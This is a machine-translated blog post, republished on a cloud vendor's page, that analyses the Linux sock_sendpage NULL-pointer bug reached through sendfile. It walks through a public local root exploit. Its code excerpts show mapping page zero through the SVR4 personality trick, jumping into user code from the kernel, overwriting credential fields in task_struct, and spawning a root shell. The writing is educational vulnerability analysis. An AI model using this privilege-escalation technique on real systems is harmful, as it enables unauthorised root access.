Analyzes a Linux kernel bug caused by sendfile

Source: Internet
Author: User
Tags sendfile

I have read the Usage Analysis of sock_sendpage, a new high-risk Kernel Vulnerability.
This post outlines the beginning and end of the entire vulnerability under the guidance of jiujianyi and cuer. I would like to share with you the space for self-Reference
).
Are there any shortcomings ~

Kernel bug

This bug must start with the sendfile system call.
Consider sending a local file through socket. The common practice is to open the file FD and a socket, read data from the file FD cyclically, and read
To the socket. In this way, each read/write operation requires two system calls, and the data will be copied from the kernel to the user space (read), and then from the user space to the kernel
(Send ).

Sendfile encapsulates the entire sending process in one system call, avoiding multiple system calls and avoiding a large amount of data copying between the kernel space and the user space.

Ssize_t sendfile (INT out_fd, int in_fd, off_t * offset, size_t count );

Although the system calls to receive in and out two FD, but there are restrictions, in can only be a common file, out can only be socket (this restriction does not know whether the later kernel version has been relaxed ).

How does sendfile system call be implemented in the kernel? This is still relatively complicated. It does the original tasks in the user State in the kernel: create a pipe object as a buffer, read data from in_fd to pipe, write data in pipe to out_fd, and refresh until the end condition is met.
The process of writing data to out_fd is briefly described as follows:
Sys_sendfile
=> Entry
Do_sendfile
=> Parameter check. The file structure corresponding to out_fd contains the sendfile method (out_file-> f_op-> sendpage)
Do_splice_direct
=> The final call is out_file-> f_op-> splice_write, while out_file is a socket, and its f_op-> splice_write is equal to generic_splice_sendpage
Generic_splice_sendpage
=> Finally, call out_file-> f_op-> sendpage. The sendpage is equal to sock_sendpage.

The code for sock_sendpage is as follows:

Struct socket * sock;
Int flags;
Sock = file-> private_data;
Flags =! (File-> f_flags & o_nonblock )? 0: msg_dontwait;
If (more)


Flags | = msg_more;
Return sock-> OPS-> sendpage (sock, page, offset, size, flags );

Note that the bug occurs. The function pointer is not null before calling sock-> OPS-> sendpage.
(Here, sock-> OPS-> sendpage is called.
Out_file-> f_op-> private_data-> OPS-> sendpage, out_file-> f_op-> private_data
The Pointer Points to a struct Socket Structure, because this FD represents a socket .)

However, can sock-> OPS-> sendpage be null? You can search for the kernel code and find that not every type of socket is implemented.
Sendpage function. But most sockets that do not implement this function set this function pointer to sock_no_sendpage (this is basically a routine
Empty function ). However, sock-> OPS-> sendpage is not set for a few types of sockets (if not set, the default value is null), as shown in figure
Pf_pppox, pf_bluetooth, and so on. (The code given in the above link uses pf_pppox. Later I found that pf_bluetooth can also be used
But not pf_inet .)

Use this bug

As we can see above, the kernel calls the sendfile system without judging whether sock-> OPS-> sendpage is empty, and Sock-> OPS-> sendpage may be empty.

What will happen if a function pointer with a null value is called in our program? Naturally, the program crashes, that is, the crash. So how can such a thing be exploited to steal the root identity? Let's gradually interpret the code given in the above link.
Main function main ():

Char template [] = "/tmp/padlina. xxxxxx ";
Int fdin, fdout;
Void * page;
Uid = getuid (); // obtain the user ID, which is useful later

Gid = getgid (); // obtain the user group ID, which is useful later.

Setresuid (UID, uid, UID); // ensure that the user ID is set to the Process

Setresgid (GID, GID, GID); // ensure that the user group ID is set to the Process

// The following sentence will be harsh, and it will take 0 ~ 1000 of addresses are mapped and executable properties are set.

If (personality (0 xffffffff ))! = Per_svr4 ){


If (page = MMAP (0x0, 0x1000, prot_read | prot_write, map_fixed | map_anonymous, 0, 0) = map_failed ){



Perror ("MMAP ");



Return-1;


}
} Else {


If (mprotect (0x0, 0 x1000, prot_read | prot_write | prot_exec) <0 ){



Perror ("mprotect ");



Return-1;


}
}
// The following statements are more harsh. Write the JMP command to kernel_code on the zero address mapped just now.

* (Char *) 0 = '/x90'; // NOP

* (Char *) 1 = '/xe9'; // JMP

* (Unsigned long *) 2 = (unsigned long) & kernel_code-6; // here is the relative jump,-6 is minus the current address value

// Create a temporary file as the source file

If (fdin = mkstemp (Template) <0 ){


Perror ("mkstemp ");


Return-1;
}
// Create a socket. Note that its type is pf_pppox.

If (fdout = socket (pf_pppox, sock_dgram, 0) <0 ){


Perror ("socket ");


Return-1;
}
// The following focuses on sendfile.

Unlink (Template );
Ftruncate (fdin, page_size );
Sendfile (fdout, fdin, null, page_size );

After the previous introduction, we can see that the sendfile will trigger the call to the 0 address in the system call. However, the JMP command to kernel_code has been written on the 0 address.
The kernel_code here is actually a function compiled with this main, which we will see below.

Current situation

After the sendfile system is called, the CPU enters the kernel state. The kernel state can do anything the CPU can do. Generally, only the kernel code can be executed in the kernel state, which is guaranteed by the kernel.
But now, the kernel code calls the 0-address function and enters the user code kernel_code. As a result, programmers can do any kernel in the kernel_code code they write.
What can be done.
Note: Generally, there are special commands (such as iret) returned from the kernel state to the user State, which will change the CPU privilege level at the same time. But this is not the case now. The kernel code is equivalent to directly calling the function written by the programmer and does not return the user State.

On the other hand, the kernel code can easily access the data structure of the kernel, because the kernel code is compiled in one piece, and the object address is known and the structure is clear. What code does the programmer write in kernel_code? Although they have the same access permissions as the kernel code, but do not know the data address and status, they are blind now.
Next, you will see how the author of the sample code crossed the river by feeling the stones in the kernel_code code.

Started to do bad things.

The kernel_code function consists of three steps:

1. Obtain task_struct

Uint * P = get_current ();

The get_current code is as follows:

_ ASM _ volatile __(


"Movl % ESP, % eax;" // assign the stack pointer value to eax



"Andl % 1, % eax;" // compare the pointer value ~ 8191 (the last 13bit is 0)



"Movl (% eax), % 0" // output the result to the curr variable. This is the task_struct pointer.



: "= R" (curr)


: "I "(~ 8191)
);

In the kernel, each process has a thread_info structure and a kernel stack. These two things are distributed in two consecutive pages, and the thread_info structure is in front,
Stack on the back. The first element of the thread_info structure is a task, which is a pointer to the task_struct structure (generally referred to as the process control block. In this
The task_struct structure stores the main information of the process.
(Note: During Linux 2.4, the two pages here store the task_struct structure and kernel stack, and there is no such layer as thread_info .)
In a 32-bit system, the size of a page is 4 kb, And the last 12bit of the first byte of the page is 0. The task_struct structure is equivalent to the two pages alignment, and the last 13bit of the first address is 0.
Then, after clearing the last 13bit by using the stack pointer value, the thread_info structure corresponding to the process is obtained, and then the thread_info structure is used as the pointer (the first word of this structure, that is, the task pointer pointing to the task_struct structure) to obtain the task_struct structure.
(In fact, it is stupid to get the task_struct structure through such a piece of assembly code. The simplest way is to take any variable defined on the current stack and clear the last 13 digits of the address to 0 .)

2. What should I do if I get task_struct? The purpose of the sample code is to modify the user information recorded in task_struct so that the process becomes a process started by the root.

For (I = 0; I <1024-13; I ++ ){



If (P [0] = uid
& P [1] = uid & P [2] = uid & P [3] = uid
& P [4] = GID & P [5] = GID & P [6] = GID
& P [7] = GID ){



P [0] = P [1] = P [2] = P [3] = 0;



P [4] = P [5] = P [6] = P [7] = 0;



P = (uint *) (char *) (p + 8) + sizeof (void *));



P [0] = P [1] = P [2] = ~ 0;



Break;


}


P ++;
}

Recall that the main function has obtained the user and user group ID and set it to the process (in the task_struct structure of the process ). So, search
The task_struct structure tries to match these IDs. In different versions of the kernel, the locations of these IDs may not be the same, but they are always in the same order.
If it is matched, the storage locations of these IDs are found. Then, you can change all of them to 0. This process becomes the root user process.

However, this method of modifying the UID does not work in newer versions of the kernel. The UID and GID information is not directly stored in the task_struct structure, but organized into a structure called cred, the task_struct structure then saves the pointer to the corresponding cred structure.

3. Return to user status
Now, the identity has been changed. The program will return to the user State, start a shell, and have a good experience with the root user ~

_ ASM _ volatile __(


"Movl % 0, 0x10 (% ESP );"


"Movl % 1, 0x0c (% ESP );"


"Movl % 2, 0x08 (% ESP );"


"Movl % 3, 0x04 (% ESP );"


"Movl % 4, 0x00 (% ESP );"


"Iret"


: "I" (user_ss), "R" (stack (exit_stack), "I" (user_fl ),


: "I" (user_cs), "R" (exit_code)
);

This code is to press the return address on the kernel stack, and then iret returns the user State. The return address is specified on exit_code, which is also a function compiled with main. The Code is as follows:

If (getuid ()! = 0 ){


Fprintf (stderr, "failed/N ");


Exit (-1 );
}
Execl ("/bin/sh", "sh", "-I", null );

Now that the program has returned to the user State, call getuid to see if it has become root. Make sure there is no supervisor. Start shell ~

Highlights

Although the above description tells the ins and outs of the kernel vulnerability in one breath, an important detail has been replaced. That is the part mapped to 0 addresses. I think this is the best touch of the entire attack code. The code is roughly as follows:

If (personality (0 xffffffff ))! = Per_svr4 ){


MMAP (0x0, 0x1000, prot_read | prot_write, map_fixed | map_anonymous, 0, 0 );

} Else {


Mprotect (0x0, 0x1000, prot_read | prot_write | prot_exec );
}


Ing 0 addresses, why is there such a branch statement not a direct MMAP? What does the personality function and mprotect function mean?
In fact, the executable files compiled by this attack code (as Exploit) are not directly executed on the shell. Instead, it is executed through a piece of C code (see run. c In the source code ):

Int main (void ){


If (personality (per_svr4) <0 ){



Perror ("personality ");



Return-1;


}


Fprintf (stderr, "padlina Z lublina! /N ");


Execl ("./exploit", "exploit", 0 );
}


We can see that the personality function is also called before execution.

Linux Kernel has strong compatibility. It can not only execute executable files compiled in Linux, but also execute executable files compiled in other operating systems: for windows and other operations
For executable files on the system, Linux runs through user-state virtual machine programs (such as wine). For executable files of Some UNIX-like systems, Linux can directly execute
Line.
However, it is not seamless to directly execute executable files of Unix-like systems in Linux. You need to set an "execution domain" to tell the kernel that the executable files of a certain system are currently executed. Therefore, the Linux kernel runs programs according to the corresponding Unix-like system rules (such as memory layout and signal processing.

The personality function shown above is used to set the "execution domain" (the default execution domain is Linux), and the above startup code will go through the personality Function
The execution domain of the program is set to svr4 (an older UNIX-like system, system V release
4 ). Therefore, when ing 0 addresses, the branch that calls the mprotect function (personality (0 xffffffff) indicates obtaining the current execution domain) will be reached ).
MMAP is a function used to allocate the virtual memory area of a process. You can set its attributes when allocating the virtual memory area. The mprotect function is a function dedicated to setting the attributes of the virtual memory area. In the attack code above, the 0 address is set to executable through this function.

In my system, if the exploit program (the branch of MMAP) is executed directly on the shell, MMAP will fail. In 32-bit Linux, the process address space is
0x08048000 is used in sequence (executable code zone, global data zone, heap, file ing zone, stack). The space from 0 address to 0x08048000 cannot be mapped.

The reason why the exploit program can map 0 addresses is that the process can map 0 addresses in an execution domain such as svr4. Specifically, the 0 address is mapped by default. The Code only modifies the ing attribute.

The following content is found in the Linux 2.6.29.4 code:
Personality. H, which has the following option definitions for the svr4 execution domain (note that there is a mmap_page_zero
Mark ):
Enum {
......
Per_svr4 = 0x0001 | sticky_timeouts | mmap_page_zero,
......
};


Binfmt_elf.c: load_elf_binary (), when loading executable files in the ELF format (the most common format in Linux), the following code (for mmap_page_zero
Mark with special processing ):
......
If (current-> personality & mmap_page_zero ){
/* Why this, you ask ??? Well svr4 maps page 0 as read-only,




And some applications "depend" upon this behavior.


Since we do not have the power to recompile these, we


Emulate the svr4 behavior. Sigh .*/


Down_write (& Current-> MM-> mmap_sem );





Error = do_mmap (null, 0, page_size, prot_read | prot_exec,





Map_fixed | map_private, 0 );





Up_write (& Current-> MM-> mmap_sem );
}
......



See the author's comment ~ In this way, the 0 address is mapped.

 

I also wrote a paper for analyzing this kernel BUG:
Http://hi.baidu.com/wzt85/blog/item/a11e013e3384f2f3838b13e6.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.